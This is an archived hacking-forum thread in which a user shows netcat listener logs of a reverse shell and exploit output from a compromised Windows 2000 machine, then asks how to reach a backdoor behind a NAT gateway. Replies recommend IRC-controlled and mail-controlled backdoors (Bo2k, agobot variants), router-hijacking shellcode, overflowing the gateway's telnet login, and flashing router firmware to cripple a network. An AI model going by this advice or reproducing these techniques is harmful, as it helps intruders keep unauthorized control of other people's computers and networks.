hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Bypassing The Gateway
Partizaan
Case connectback

QUOTE
>nc.exe -vv -L -p 141
listening on [any] 141 ...
xxx.145.18.36: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xxx.201.161.234] from (UNKNOWN) [xxx.145.18.36] 2851: NO_DATA

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.16
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        IP Address. . . . . . . . . . . . : 192.168.10.11
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.10

C:\WINNT\system32>



Case bindshell

QUOTE
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
[*] --------------------------------------------------------------------

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.64.17.49
        Subnet Mask . . . . . . . . . . . : 255.255.248.0
        Default Gateway . . . . . . . . . : 10.64.16.1

C:\WINNT\system32>


When u look @ IP u see that the shell connects to the net thrue a gateway. U see only
INTERNAL ip adresses wich means the node is not physicly connected to the inet.

So now my question: If u have a backdoor running on the remote box how can u connect to it ? (When u dont have access to the gateway). Fport is no use.
Anybody want to share the solution ?

THX

(I already have a another topic running on it but i opened a second one cause i didnt explained well what i wanted to ask).
AgentOrange
If you can't gain access to the router, i would RTFM. Sometimes by default some incoming connections multi-casted to all computers on the network. Battlenet, xbox live, aim to name a few common ones. Other than that you could try using a download exec shell code or in-line egg depends on what you are doing. One of my buddies made some win32 shell code to connect to the router and set its self as dmz host, written in C. He used the GDI+ exploit because it had 2k of elbow room, the down side is you have to know what router they have. I suggest using a backdoor that connects to a chat network. There are a large number of backdoors like this, i suggest Bo2k. Its open source and many of the agobot variants have backdoors in them ohmy.gif .

peace
hodexut
hi, i was looking at fpipe.exe - would this possibly help in this kind of situation? can anyone elaborate on their experiences with fpipe?
thanks
hodexut
Pro21
you have 3 solutions.
Depend of the configuration of the gateway.

First Case : the gateway redirect all traffic on the internal computer and it s great for you.

Second Case : you had the shell thank to a hacked routed service and to control all traffic you have to hack the gateway to set up the traffic, but it's not easy to do it.

The last, as said AgentOrange you can install an ircbot who allow you to execute commands from irc.

good luck tongue.gif
Partizaan
Ok thx guys !

Your replies confirmed that my view on the problem was correct.

Good feedback.
buzzons
Find out what router they use and just try the basic stuff on it, if its a cisco one, they are vunerable to a few things so try that wink.gif

Or make it connect back to you using a connect back shell so that it bypasses the gateway, and nat that way.

Buz
xes
just try hacking the main computer that can access the gateway, depending on what kinda gateway it is,
if its a linux gateway, look at some port scans and banner grabs with netcat,
then access the router by the main PC, to do this its always a low numbe ron the network(always static), so just try some ping sweps of the network see what PCs are on, what PC's are sending back low packets and fast packets, try find the gateways access PC by a 2000 - 3000 ms ping, its always the one that has a lot of bandwidth going to it, and access that, then telnet to the gateway and buffer the password, by finding a way to over flow it, just try random bytes from 1 4 8 16 - so on.... use a ryhem like a - aaaa - aaaabbbb - aaaabbbbccccdddd and so on. im sure u know the next numbers wink.gif if not u shouldnt be on a PC.

anywaygood luck.

P.S - i know this wouldnt have helped you, but this is a way of finding access if the gateway denies access from inside and outside network IPs that can access the telnet or ftp and so on, wink.gif use tftp to upload a flash bug wink.gif and flash there rom wink.gif u will criple there network tongue.gif(dont do it for god sakes)
LittleHacker
well there is another way closed to Pro21 3rd solution
You can install a backdoor and command it via mail !
you can bypass almost anything with such a proggy as I do
SyS49152
don't forget that even if you can't access the router from outside by telnet and so on ,you can gain a lot of info on it by snmp usually even from outside ..
Partizaan
Whell indeed like everything i do from the shell works fine. Like outbound is no problem.
But inbound is *****-up. A dos mailer works indeed fine.

Thx all for the feedback.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.